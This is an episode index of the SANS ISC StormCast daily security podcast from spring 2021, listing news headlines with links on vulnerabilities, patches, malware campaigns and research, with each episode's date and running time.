EoL SonicWall SRA 4600 VPN Gateways Exploited in Current Attacks https://isc.sans.edu/forums/diary/Sonicwall+SRA+4600+Targeted+By+an+Old+Vulnerability/27518/ Older Fortinet Vulnerability Still Exploited https://isc.sans.edu/forums/diary/Fortinet+Targeted+for+Unpatched+SSL+VPN+Discovery+Activity/27520/ PrivacyMic: Utilizing Inaudible Frequencies for Privacy Preserving Daily Activity Recognition http://alansonsample.com/publications/docs/2021%20-%20CHI%20-%20PrivacyMic-%20Utilizing%20Inaudible%20Frequencies%20for%20Privacy%20Preserving%20Daily%20Activity%20Recognition.pdf Linux Vulnerability in polkit https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
6/14/2021 6 minutes, 31 seconds

ISC StormCast for Friday, June 11th, 2021

Are Cookie Banners a Waste of Time or a Complete Waste of Time? https://isc.sans.edu/forums/diary/Are+Cookie+Banners+a+Waste+of+Time+or+a+Complete+Waste+of+Time/27436/ Citrix Application Delivery Controller Vulnerability https://support.citrix.com/article/CTX297155 VoIP Monitor GUI XSS https://www.rtcsec.com/post/2021/06/abusing-sip-for-cross-site-scripting-most-definitely/ Denial of Service Vulnerabilities in RabbitMQ, EMQ X, and VerneMQ https://www.synopsys.com/blogs/software-security/cyrc-advisory-rabbitmq-emqx-vernemq/
6/11/2021 6 minutes, 39 seconds

ISC StormCast for Thursday, June 10th, 2021

Architecture, Compilers and Black Magic https://isc.sans.edu/forums/diary/Architecture+compilers+and+black+magic+or+what+else+affects+the+ability+of+AVs+to+detect+malicious+files/27510/ ALPACA TLS Attack https://alpaca-attack.com/ALPACA.pdf Google Chrome Update https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html
6/10/2021 5 minutes, 45 seconds

ISC StormCast for Wednesday, June 9th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2021+Patch+Tuesday/27506/ PuzzleMaker Attacks With Chrome Zero-Day Exploit Chain https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/ Intel Patches https://www.intel.com/content/www/us/en/security-center/default.html Adobe Updates https://helpx.adobe.com/security.html Let's Encrypt and CentOS 7 https://blog.devgenius.io/lets-encrypt-change-affects-openssl-1-0-x-and-centos-7-49bd66016af3
6/9/2021 6 minutes, 42 seconds

ISC StormCast for Tuesday, June 8th, 2021

Amazon Sidewalk https://isc.sans.edu/forums/diary/Amazon+Sidewalk+Cutting+Through+the+Hype/27502/ Windows Container Malware https://unit42.paloaltonetworks.com/siloscape/ Darkside Ransom Confiscated https://www.documentcloud.org/documents/20799023-affidavit-1-in-application-by-the-united-states-for-a-seizure-warrant-for-one-account-for-investigation-of-18-usc-ss-981a1a-and-other-offenses-nd-cal-321-mj-70945
6/8/2021 5 minutes, 56 seconds

ISC StormCast for Monday, June 7th, 2021

Strange Goings on With Port 37 https://isc.sans.edu/forums/diary/Strange+goings+on+with+port+37/27496/
QNAP Video Station RCE Vulnerability https://www.qnap.com/de-de/security-advisory/qsa-21-21
Updated GitHub Policy https://github.blog/2021-06-04-updates-to-our-policies-regarding-exploits-malware-and-vulnerability-research/
Cisco WebEx Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-player-kOf8zVT
VMWare vCenter Server Vulnerability Actively Exploited https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html
6/7/2021, 4 minutes, 57 seconds

ISC StormCast for Friday, June 4th, 2021

Script to Test CIS Zoom Benchmark https://github.com/turbot/steampipe-mod-zoom-compliance
F5 BIG-IP Edge Client for Windows Vulnerability https://support.f5.com/csp/article/K20346072
Fancy Product Designer Wordpress Plugin Vulnerability https://www.welivesecurity.com/2021/06/03/zero-day-popular-wordpress-plugin-exploited-take-over-websites/
WordPress Pushes Jetpack Plugin Patch https://www.bleepingcomputer.com/news/security/wordpress-force-installs-jetpack-security-update-on-5-million-sites/
We.Lock Vulnerability https://github.com/CriticalSecurity/welock
6/4/2021, 6 minutes, 1 second

ISC StormCast for Thursday, June 3rd, 2021

Realtek RTL8170C Vulnerabilities https://www.vdoo.com/blog/realtek-wifi-vulnerabilities-zero-day
Huawei LTE USB Stick E3372 Vulnerability https://www.theregister.com/2021/06/02/huawei_lte_usb_stick_vulnerability/
NortonLifeLock Crypto https://investor.nortonlifelock.com/About/Investors/press-releases/press-release-details/2021/NortonLifeLock-Unveils-Norton-Crypto/default.aspx
OpenPGP RNP Patch https://www.rnpgp.org/advisories/ri-2021-001/
6/3/2021, 5 minutes, 28 seconds

ISC StormCast for Wednesday, June 2nd, 2021

Guildma is now using Finger and Signed Binary Proxy Execution to Evade Defenses https://isc.sans.edu/forums/diary/Guildma+is+now+using+Finger+and+Signed+Binary+Proxy+Execution+to+evade+defenses/27482/
Bypassing Protected Folders Protections https://dl.acm.org/doi/10.1145/3431286
Firefox 89 Released https://www.mozilla.org/en-US/security/advisories/mfsa2021-23/
Microsoft Edge Will Make HTTPS Default https://blogs.windows.com/msedgedev/2021/06/01/available-for-preview-automatic-https-helps-keep-your-browsing-more-secure/
6/2/2021, 6 minutes, 12 seconds

ISC StormCast for Tuesday, June 1st, 2021

Malicious PowerShell Hosted on script.google.com https://isc.sans.edu/forums/diary/Malicious+PowerShell+Hosted+on+scriptgooglecom/27468/
Sonicwall Advisory https://www.sonicwall.com/support/product-notification/security-advisory-on-prem-sonicwall-network-security-manager-nsm-command-injection-vulnerability/210525121534120/
Hewlett Packard Enterprise Systems Insight Manager (SIM) Advisory https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us
Memory Protection Bypass in Siemens PLCs https://claroty.com/2021/05/28/blog-research-race-to-native-code-execution-in-plcs/
6/1/2021, 4 minutes, 59 seconds

ISC StormCast for Friday, May 28th, 2021

AV evasion with 64-bit Executables https://isc.sans.edu/forums/diary/All+your+Base+arenearly+equal+when+it+comes+to+AV+evasion+but+64bit+executables+are+not/27466/
Unpatched WebKit Vulnerability in iOS/macOS https://blog.theori.io/research/webkit-type-confusion/
VSCode Extension Vulnerabilities https://snyk.io/blog/visual-studio-code-extension-security-vulnerabilities-deep-dive/
M1RACLES https://m1racles.com
5/28/2021, 6 minutes, 58 seconds

ISC StormCast for Thursday, May 27th, 2021

A Survey of Bluetooth Vulnerabilities https://isc.sans.edu/forums/diary/A+Survey+of+Bluetooth+Vulnerabilities+Trends/27460/
Google Chrome Update https://chromereleases.googleblog.com/2021/05/stable-channel-update-for-desktop_25.html
Attacks on PDF Certification https://www.pdf-insecurity.org
nginx vulnerability https://x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
5/27/2021, 5 minutes, 57 seconds

ISC StormCast for Wednesday, May 26th, 2021

Uncovering Shenanigans in an IP Address Block via Hurricane Electric's BGP Toolkit https://isc.sans.edu/forums/diary/Uncovering+Shenanigans+in+an+IP+Address+Block+via+Hurricane+Electrics+BGP+Toolkit/27456/
VMware Advisory https://www.vmware.com/security/advisories/VMSA-2021-0010.html
Trend Micro Bugs https://blog.talosintelligence.com/2021/05/vuln-spotlight-trend-i.html
5/26/2021, 4 minutes, 59 seconds

ISC StormCast for Tuesday, May 25th, 2021

Apple Patches 0-Days https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/ https://support.apple.com/en-us/HT201222
Bluetooth Vulnerabilities https://kb.cert.org/vuls/id/799380 https://francozappa.github.io/about-bias/publication/antonioli-20-bias/antonioli-20-bias.pdf
NAGIOS Vulnerabilities https://skylightcyber.com/2021/05/20/13-nagios-vulnerabilities-7-will-shock-you/
5/25/2021, 4 minutes, 56 seconds

ISC StormCast for Monday, May 24th, 2021

Serverless Phishing Campaign https://isc.sans.edu/forums/diary/Serverless+Phishing+Campaign/27446/
Locking Kernel32.dll As Anti-Debugging Technique https://isc.sans.edu/forums/diary/Locking+Kernel32dll+As+AntiDebugging+Technique/27444/
WinRM Vulnerable to http.sys Vulnerability https://twitter.com/JimDinMN/status/1395071966487269376
Mozilla Firefox "Content-Type Confusion" Unsafe Code Execution https://besteffortteam.it/mozilla-firefox-content-type-confusion-unsafe-code-execution/
5/24/2021, 6 minutes, 25 seconds

ISC StormCast for Friday, May 21st, 2021

New YouTube Video Series: Everything you ever wanted to know about DNS and more https://isc.sans.edu/forums/diary/New+YouTube+Video+Series+Everything+you+ever+wanted+to+know+about+DNS+and+more/27440/
And Ransomware Just Got a Bit Meaner https://isc.sans.edu/forums/diary/And+Ransomware+Just+Got+a+Bit+Meaner+yes+it+is+possible/27438/
Attackers Scanned for Exchange Servers Five Minutes after Patch Release https://www.ehackingnews.com/2021/05/microsoft-exchange-bug-report-allowed.html
GPS For Authentication: Is the Juice Worth the Squeeze @sans_edu https://www.sans.org/reading-room/whitepapers/authentication/gps-authentication-juice-worth-squeeze-40270
5/21/2021, 19 minutes, 50 seconds

ISC StormCast for Thursday, May 20th, 2021

May 2021 Forensic Contest: Answers and Analysis https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest+Answers+and+Analysis/27430/
CIS Controls V8 https://www.cisecurity.org/controls/v8/
Dell iDRAC 9 Security Update https://www.dell.com/support/kbdoc/en-us/000186420/dsa-2021-082-dell-emc-idrac-9-security-update-for-improper-authentication-vulnerability
QNAP Pre-Auth Remote Code Execution in MusicStation/MalwareRemover https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/
5/20/2021, 6 minutes, 7 seconds

ISC StormCast for Wednesday, May 19th, 2021

From RunDLL32 to JavaScript then PowerShell https://isc.sans.edu/forums/diary/From+RunDLL32+to+JavaScript+then+PowerShell/27428/
New Pulse Secure VPN Advisory https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800/
Android Stalkerware Vulnerabilities https://www.welivesecurity.com/2021/05/17/android-stalkerware-threatens-victims-further-exposes-snoopers-themselves/
Double Encrypting Ransomware https://www.wired.com/story/ransomware-double-encryption/
5/19/2021, 5 minutes, 21 seconds

ISC StormCast for Tuesday, May 18th, 2021

Ransomware Defenses https://isc.sans.edu/forums/diary/Ransomware+Defenses/27420/
AXA Stops Ransomware Payments https://www.insurancejournal.com/news/international/2021/05/09/613255.htm
http.sys Proof of Concept https://github.com/0vercl0k/CVE-2021-31166
Google/Mozilla Collaborating on HTML Sanitizer API https://wicg.github.io/sanitizer-api/#sanitizer-api
SANS Technology Institute Research Journal https://www.sans.edu/cyber-research
5/18/2021, 6 minutes, 8 seconds

ISC StormCast for Monday, May 17th, 2021

"Open" Access to Industrial Systems Interfaces is Also Far From Zero https://isc.sans.edu/forums/diary/Open+Access+to+Industrial+Systems+Interface+is+Also+Far+From+Zero/27418/
Malicious Rust Macro for VSCode https://github.com/lucky/bad_actor_poc
Exim PoC Released https://adepts.of0x.cc/exim-cve-2020-28018/
Newly Observed PHP-based Skimmer Shows Ongoing Magecart Group 12 Activity https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/
5/17/2021, 5 minutes, 41 seconds

ISC StormCast for Friday, May 14th, 2021

Cross Browser Tracking with Schemeflood https://fingerprintjs.com/blog/external-protocol-flooding/
Cisco AnyConnect Secure Mobility Client Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-ipc-KfQO9QhK
MSBuild Abused By Attackers https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly
5/14/2021, 6 minutes, 48 seconds

ISC StormCast for Thursday, May 13th, 2021

Number of industrial control systems on the internet is lower than in 2020...but still far from zero https://isc.sans.edu/forums/diary/Number+of+industrial+control+systems+on+the+internet+is+lower+then+in+2020but+still+far+from+zero/27412/
Webcast: Ransoming Critical Infrastructure https://www.sans.org/webcasts/119775
Links to FragAttacks Vendor Bulletins (in German) https://www.heise.de/news/WLAN-Sicherheitsluecken-FragAttacks-Erste-Updates-6045116.html
Adobe Acrobat Patches https://helpx.adobe.com/security/products/acrobat/apsb21-29.html
Sending Arbitrary Messages via FindMy https://positive.security/blog/send-my
5/13/2021, 5 minutes, 51 seconds

ISC StormCast for Wednesday, May 12th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2021+Patch+Tuesday/27408
WiFi Fragmentation Attacks https://www.fragattacks.com
5/12/2021, 6 minutes, 30 seconds

ISC StormCast for Tuesday, May 11th, 2021

Validating IP Addresses: Why Encoding Matters https://isc.sans.edu/forums/diary/Correctly+Validating+IP+Addresses+Why+encoding+matters+for+input+validation/27404/
Jail Breaking AirTags https://twitter.com/ghidraninja/status/1391148503196438529
Malicious Tor Exit Relay Activities https://nusenu.medium.com/tracking-one-year-of-malicious-tor-exit-relay-activities-part-ii-85c80875c5df
5/11/2021, 5 minutes, 27 seconds

ISC StormCast for Monday, May 10th, 2021

Who is Probing the Internet for Research Purposes https://isc.sans.edu/forums/diary/Who+is+Probing+the+Internet+for+Research+Purposes/27400/
Cycle Hunter and tsuNAME DDoS Attack https://github.com/SIDN/CycleHunter https://tsuname.io/tech_report.pdf
Foxit Reader / Phantom PDF Vulnerabilities https://www.foxitsoftware.com/support/security-bulletins.html?Security+updates+available+in+Foxit+Reader+10.1.4+and+Foxit+PhantomPDF+10.1.42021-05-06
Hypocrite Patches Reviewed By Linux Foundation https://lore.kernel.org/lkml/202104221451.292A6ED4@keescook/
5/10/2021, 5 minutes, 22 seconds

ISC StormCast for Friday, May 7th, 2021

Scans for Exposed Azure Storage Containers https://isc.sans.edu/forums/diary/Exposed+Azure+Storage+Containers/27396/
Qualcomm MSM Vulnerability https://research.checkpoint.com/2021/security-probe-of-qualcomm-msm/
Google to Automatically Enroll Users in 2SV https://blog.google/technology/safety-security/a-simpler-and-safer-future-without-passwords/
New Cellebrite Vulnerabilities Announced https://www.ehackingnews.com/2021/05/new-vulnerabilities-in-cellebrites.html
5/7/2021, 5 minutes, 36 seconds

ISC StormCast for Thursday, May 6th, 2021

May 2021 Forensic Contest https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest/27386/
Windows Defender Bug Fills Windows 10 Boot Drive with thousands of files https://www.bleepingcomputer.com/news/microsoft/windows-defender-bug-fills-windows-10-boot-drive-with-thousands-of-files/
VMWare vRealize Business for Cloud Patch https://kb.vmware.com/s/article/83475
Cisco Updates SD-WAN vManager / HyperFlex HX https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities
Security and Privacy Risks of Number Recycling at Mobile Carriers in the US https://recyclednumbers.cs.princeton.edu
5/6/2021, 6 minutes, 17 seconds

ISC StormCast for Wednesday, May 5th, 2021

Android Update https://source.android.com/security/bulletin/2021-05-01?hl=en
Dell Privilege Escalation Vulnerability https://www.dell.com/support/kbdoc/en-us/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
Exim Mail Server Vulnerabilities https://www.qualys.com/2021/05/04/21nails/21nails.txt
Quick and Dirty Python: masscan https://isc.sans.edu/forums/diary/Quick+and+dirty+Python+masscan/27384/
ICMP Tunnel Backdoor https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/
5/5/2021, 5 minutes, 31 seconds

ISC StormCast for Tuesday, May 4th, 2021

Apple Patches 2 0-Day Flaws in WebKit affecting iOS/MacOS/WatchOS https://support.apple.com/en-us/HT201222
PoC Exploit for CVE-2021-28482 (Microsoft Exchange) https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda https://testbnull.medium.com/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482-e713001d915f
Yet Another Processor Side-Channel: Micro-Ops Caches http://www.cs.virginia.edu/venkat/papers/isca2021a.pdf
Pulse Secure Update https://blog.pulsesecure.net/pulse-connect-secure-patch-availability-sa44784/
5/4/2021, 4 minutes, 42 seconds

ISC StormCast for Monday, May 3rd, 2021

Qiling: A true instrumentable binary emulation framework https://isc.sans.edu/forums/diary/Qiling+A+true+instrumentable+binary+emulation+framework/27372/
Python "ipaddress" improper input validation https://sick.codes/sick-2021-014/
EXIF Tool Vulnerabilities https://twitter.com/wcbowling/status/1385803927321415687
ABUS Secvest Internet Connected Alarm Systems https://eye.security/nl/blog/breaking-abus-secvest-internet-connected-alarm-systems-cve-2020-28973
FiveHands Ransomware Installed via SonicWall Flaw https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html
5/3/2021, 5 minutes, 31 seconds

ISC StormCast for Friday, April 30th, 2021

From Python to .Net https://isc.sans.edu/forums/diary/From+Python+to+Net/27366/
PHP Composer Vulnerability https://blog.sonarsource.com/php-supply-chain-attack-on-composer
Microsoft Identifies Several Integer Overflow Vulnerabilities https://us-cert.cisa.gov/ics/advisories/icsa-21-119-04
4/30/2021, 5 minutes, 19 seconds

ISC StormCast for Thursday, April 29th, 2021

Stopping Google FLoC https://github.blog/changelog/2021-04-27-github-pages-permissions-policy-interest-cohort-header-added-to-all-pages-sites/ https://amifloced.org
RotaJakiro Backdoor https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/
F5 Big IP Kerberos Spoofing Vulnerability https://support.f5.com/csp/article/K51213246
4/29/2021, 5 minutes, 14 seconds

ISC StormCast for Wednesday, April 28th, 2021

Diving into a Singapore Post Phishing E-Mail https://isc.sans.edu/forums/diary/Diving+into+a+Singapore+Post+Phishing+Email/27356/
Two in Five Victims of Online Scam Adverts Do Not Report to Host Platforms https://www.which.co.uk/news/2021/04/two-in-five-victims-of-online-scam-adverts-dont-report-to-host-platforms/
Microsoft Defender Blocks Cryptojacking Malware https://www.microsoft.com/security/blog/2021/04/26/defending-against-cryptojacking-with-microsoft-defender-for-endpoint-and-intel-tdt/
Linux Privilege Escalation Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2020-1211
4/28/2021, 4 minutes, 25 seconds

ISC StormCast for Tuesday, April 27th, 2021

CAD: .DGN and .MVBA Files analyzed with oledump https://isc.sans.edu/forums/diary/CAD+DGN+and+MVBA+Files/27354/ MacOS 0-Day Bug Patched https://objective-see.com/blog/blog_0x64.html https://support.apple.com/en-us/HT201222 Emotet Uninstaller Triggered https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/ HashiCorp Code Signing Key Exposed By Codecov Compromise https://www.theregister.com/2021/04/26/hashicorp_reveals_exposure_of_private/
4/27/2021 - 7 minutes, 23 seconds

ISC StormCast for Monday, April 26th, 2021

Compact VBA Macros https://isc.sans.edu/forums/diary/Malicious+PowerPoint+AddOn+Small+Is+Beautiful/27342/
Base64 Strings Used in Web Scanning https://isc.sans.edu/forums/diary/Base64+Hashes+Used+in+Web+Scanning/27346/
Clickstudios Password Manager Compromise https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/
Homebrew Code Execution Vulnerability https://brew.sh/2021/04/21/security-incident-disclosure/
Apple AirDrop Shares Personal Data https://www.informatik.tu-darmstadt.de/fb20/ueber_uns_details_231616.en.jsp
4/26/2021 - 5 minutes, 46 seconds

ISC StormCast for Friday, April 23rd, 2021

How Safe are Your Docker Images https://isc.sans.edu/forums/diary/How+Safe+Are+Your+Docker+Images/27340/
Additional SolarWinds Infrastructure https://www.riskiq.com/blog/external-threat-management/solarwinds-c2-servers-new-tactics/
Cellebrite Exploit https://signal.org/blog/cellebrite-vulnerabilities/
Duo 2FA Bypass https://sensepost.com/blog/2021/duo-two-factor-authentication-bypass/
4/23/2021 - 5 minutes, 51 seconds

ISC StormCast for Thursday, April 22nd, 2021

Linux Kernel Maintainer Calls Out "hypocrite commits" by University of Minnesota https://lore.kernel.org/lkml/[email protected]/ https://github.com/QiushiWu/QiushiWu.github.io/blob/main/papers/OpenSourceInsecurity.pdf https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf
QNAP QLocker uses 7-Zip https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/
Chrome 0-Day Fixed https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html
4/22/2021 - 6 minutes, 25 seconds

ISC StormCast for Wednesday, April 21st, 2021

Pulse Secure VPN 0-Day Exploited https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/
SonicWall Vulnerabilities https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/
Synology Vulnerability https://blog.talosintelligence.com/2021/04/vuln-spotlight-synology-dsm.html#more
Air Fryer Vulnerability https://blog.talosintelligence.com/2021/04/vuln-spotlight-co.html
4/21/2021 - 6 minutes, 15 seconds

ISC StormCast for Tuesday, April 20th, 2021

Hunting Phishing Websites with Favicon Hashes https://isc.sans.edu/forums/diary/Hunting+phishing+websites+with+favicon+hashes/27326/
Nagios XI Vulnerability Exploited by Cryptominers https://unit42.paloaltonetworks.com/nagios-xi-vulnerability-cryptomining/
XCSSET Malware Adapting to MacOS 11 and M1 https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html
QNAP Patches https://www.qnap.com/de-de/security-advisories?ref=security_advisory_details
Juniper Updates https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES
4/20/2021 - 5 minutes, 3 seconds

ISC StormCast for Monday, April 19th, 2021

Decoding Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Decoding+Cobalt+Strike+Traffic/27322/
Codecov Breach https://about.codecov.io/security-update/
Google Project Zero Tweaks Disclosure Rules https://googleprojectzero.blogspot.com
EIPStackGroup OpENer Ethernet/IP https://us-cert.cisa.gov/ics/advisories/icsa-21-105-02
DNS Problems with Windows 10 Security Update https://www.bleepingcomputer.com/news/microsoft/mandatory-windows-10-update-causing-dns-and-shared-folder-issues/
4/19/2021 - 5 minutes, 36 seconds

ISC StormCast for Friday, April 16th, 2021

Why and How You Should be Using an Internal Certificate Authority https://isc.sans.edu/forums/diary/Why+and+How+You+Should+be+Using+an+Internal+Certificate+Authority/27314/
Vulnerabilities Used By Russian Foreign Intelligence Service https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/
Insecure URL Handling https://positive.security/blog/url-open-rce
SANS Research Paper: Bryan Scarbrough; Malware Detection in Encrypted TLS Traffic Through Machine Learning https://www.sans.org/reading-room/whitepapers/artificialintelligence/malware-detection-encrypted-tls-traffic-machine-learning-40185
4/16/2021 - 14 minutes, 20 seconds

ISC StormCast for Thursday, April 15th, 2021

April 2021 Forensics Quiz Solution https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz+Answers+and+Analysis/27308/
Adobe Patch Tuesday https://helpx.adobe.com/security.html
Chrome 90 Released (and 0-Day Exploits) https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_14.html https://github.com/avboy1337/1195777-chrome0day https://github.com/r4j0x00/exploits/tree/master/chrome-0day
SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=573801649
Linux/Mac Malware included in npm Module https://blog.sonatype.com/damaging-linux-mac-malware-bundled-within-browserify-npm-brandjack-attempt
Congratulations to the SANS.edu National Cyber League Teams! https://twitter.com/SANS_EDU/status/1382453652602941440
4/15/2021 - 6 minutes, 9 seconds

ISC StormCast for Wednesday, April 14th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2021+Patch+Tuesday/27306/
NAME:WRECK DNS Vulnerabilities https://www.forescout.com/research-labs/namewreck/
4/14/2021 - 5 minutes, 43 seconds

ISC StormCast for Tuesday, April 13th, 2021

Example of Cleartext Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Example+of+Cleartext+Cobalt+Strike+Traffic+Thanks+Brad/27300/
ASA 5506 Series Security Appliances Field Notice https://www.cisco.com/c/en/us/support/docs/field-notices/720/fn72019.html
Expired Certificate for PulseSecure VPN Devices https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44781/?kA13Z000000fzbR
Pwn2Own Summary https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html
Tesla Exploited Via Google Chrome Vulnerability https://leethax0.rs/2021/04/ElectricChrome/
4/13/2021 - 6 minutes, 4 seconds

ISC StormCast for Monday, April 12th, 2021

No Python Interpreter? This Simple RAT Installs Its Own Copy https://isc.sans.edu/forums/diary/No+Python+Interpreter+This+Simple+RAT+Installs+Its+Own+Copy/27292/
Facebook Mistakenly Suggests Adding Domains To Public Suffix List will Ease Tracking https://publicsuffix.org https://www.facebook.com/business/help/331612538028890?id=428636648170202
Facebook Ads Used to Push Clubhouse Related Malware https://www.ehackingnews.com/2021/04/cybercriminals-used-facebook-ads-to.html
Identifying Cobalt Strike DNS Infrastructure https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors
4/12/2021 - 6 minutes, 48 seconds

ISC StormCast for Friday, April 9th, 2021

Simple Powershell Ransomware Creating a 7Z Archive of your Files https://isc.sans.edu/forums/diary/Simple+Powershell+Ransomware+Creating+a+7Z+Archive+of+your+Files/27286/
HTML Lego: Hidden Phishing at Free JavaScript Site https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-lego-hidden-phishing-at-free-javascript-site/
Royal Flush: Privilege Escalation Vulnerability in Azure Functions https://www.intezer.com/blog/cloud-security/royal-flush-privilege-escalation-vulnerability-in-azure-functions/
Cisco Small Business Router Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-q3rxHnvm
Google Chrome Blocking Port 10080 https://github.com/whatwg/fetch/issues/1191#issuecomment-797659444
4/9/2021 - 5 minutes, 42 seconds

ISC StormCast for Thursday, April 8th, 2021

WiFi IDS and Private MAC Addresses https://isc.sans.edu/forums/diary/WiFi+IDS+and+Private+MAC+Addresses/27288/
Update on PHP Incident https://externals.io/message/113981
Details about Linux Kernel Bluetooth Vulnerabilities https://google.github.io/security-research/pocs/linux/bleedingtooth/writeup.html
LinkedIn Leak https://www.ehackingnews.com/2021/04/data-stolen-from-500-million-linkedin.html
VMware Carbon Black Cloud Workload Appliance Authentication Bypass https://www.vmware.com/security/advisories/VMSA-2021-0005.html
Cisco SD-WAN vManage Software Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-YuTVWqy
4/8/2021 - 6 minutes, 44 seconds

ISC StormCast for Wednesday, April 7th, 2021

Malspam with Lokibot vs. Outlook and RFCs https://isc.sans.edu/forums/diary/Malspam+with+Lokibot+vs+Outlook+and+RFCs/27282/
SAP Attacks https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications
QNAP Updates Older EOL Devices https://www.qnap.com/de-de/release-notes/qts/4.3.6.1620/20210322
GIGASET Android Phones Infected by Compromised Update Server https://www.heise.de/news/Gigaset-Malware-Befall-von-Android-Geraeten-des-Herstellers-gibt-Raetsel-auf-6006464.html
4/7/2021 - 5 minutes, 48 seconds

ISC StormCast for Tuesday, April 6th, 2021

LinkedIn Spear-Phishing Campaign Targets Job Hunters https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/
Malicious Text Files (CVE-2019-8761) https://www.paulosyibelo.com/2021/04/this-man-thought-opening-txt-file-is.html
Rust Privacy Concerns https://www.bleepingcomputer.com/news/security/most-loved-programming-language-rust-sparks-privacy-concerns/
4/6/2021 - 5 minutes, 45 seconds

ISC StormCast for Monday, April 5th, 2021

C2 Activity: Sandboxes or Real Victims https://isc.sans.edu/forums/diary/C2+Activity+Sandboxes+or+Real+Victims/27272/
Exploitation of Fortinet FortiOS Vulnerabilities https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios https://www.ic3.gov/Media/News/2021/210402.pdf
GitHub Actions Used to Mine Crypto https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/
Large Facebook Leak https://thehackernews.com/2021/04/533-million-facebook-users-phone.html
4/5/2021 - 5 minutes, 57 seconds

ISC StormCast for Friday, April 2nd, 2021

April 2021 Forensic Quiz https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz/27266/
Coinhive Domains Used to Warn Victims https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/
Detecting Attacker's BITS Utility Use https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html
Kansas Man Indicted For Tampering With Public Water System https://www.justice.gov/usao-ks/pr/indictment-kansas-man-indicted-tampering-public-water-system
Older QNAP Devices Vulnerable And No Longer Patched https://securingsam.com/new-vulnerabilities-allow-complete-takeover/
4/2/2021 - 6 minutes, 16 seconds

ISC StormCast for Thursday, April 1st, 2021

Quick Analysis of a Modular InfoStealer https://isc.sans.edu/forums/diary/Quick+Analysis+of+a+Modular+InfoStealer/27264/
Google Chrome Update / DoH on Linux https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html https://docs.google.com/document/d/1zAdSK393IznaLKQ0ItOmwLBy59fIq9ydxBRJQX-2ntQ/edit#
Chinese Tax Authority Facial Recognition System Fooled https://www.scmp.com/tech/tech-trends/article/3127645/chinese-government-run-facial-recognition-system-hacked-tax
4/1/2021 - 4 minutes, 53 seconds

ISC StormCast for Wednesday, March 31st, 2021

